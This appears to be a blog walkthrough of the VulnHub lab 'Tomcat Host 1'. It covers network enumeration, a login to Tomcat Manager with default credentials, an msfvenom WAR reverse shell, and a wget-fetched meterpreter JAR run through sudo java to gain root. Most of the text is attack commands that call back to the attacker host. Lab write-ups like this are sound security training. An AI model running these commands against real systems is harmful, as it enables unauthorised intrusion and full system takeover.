Tomcat Host

Welcome to “My Tomcat Host”. This boot to root VM is designed for testing your basic enumeration skills and concepts.

Url: Tomcat Host 1 VulnHub

Difficulty: Easy/Beginner Level

Author: Akanksha Sachin Verma

Enumeration

Firstly, a netdiscover scan will reveal how the machine can be identified on the network:

netdiscover -i eth1
some more code for example

netdiscover

Then an nmap scan:

nmap -p- -A 192.168.56.110

nmap

A closer look at port 8080 on my browser reveals an Apache Tomcat/9.0.31

tomcat

Apache Tomcat is an application server designed to execute Java servlets and render web pages that use Java Server page coding.

The “Manager App” section requires a username and password. The default credentials for Tomcat work (tomcat:tomcat).

192.168.56.110:8080/manager/html

The Web Application Manager is an opportunity to upload a reverse shell. I’ll be using msfvenom to create a reverse shell. This is a good website on how to use msfvenom for reference:

Offensive Security

The payload must be a war file, listening on port 4444 with my local address.

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f war > fedai.war

This will be uploaded here:

upload

Before executing the payload, listen on port 4444 with netcat:

nc -nvlp 4444

Now it must be executed, so we visit the path where it is kept, in my case /fedai. We now have a reverse shell. Uid is ‘tomcat’.

id
python -c 'import pty;pty.spawn("/bin/bash")'

deployed

User

Always check sudo privileges to see how we can start escalating privileges:

sudo -l

sudo l

As demonstrated, the user tomcat can run commands here: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java. This is an openjdk java binary file which we can use to exploit priviliges.

We’ll be creating another reverse shell payload on meterpreter in a java file format. Listening port will be 5555 with my local IP address again. The file will be downloaded on the victims pc so this file will be created under the apache web directory on my machine.

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost=192.168.56.101 lport=5555 > fedai.jar

www

Start the apache2 service:

service apache2 start

Go to the temp directory on the victim’s machine and transfer the payload over.

cd /tmp
wget http://192.168.56.101/fedai.jar

wget

Root

Before executing, we need to set up the meterpreter payload listener on metasploit:

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lport 5555
run

meterpreter

Let’s execute this payload with the following command:

sudo java -jar fedai.jar

exe

We get a successful connection from the tomcat machine as seen on meterpreter, the current user has been identified as root!

connection

Written on May 3, 2020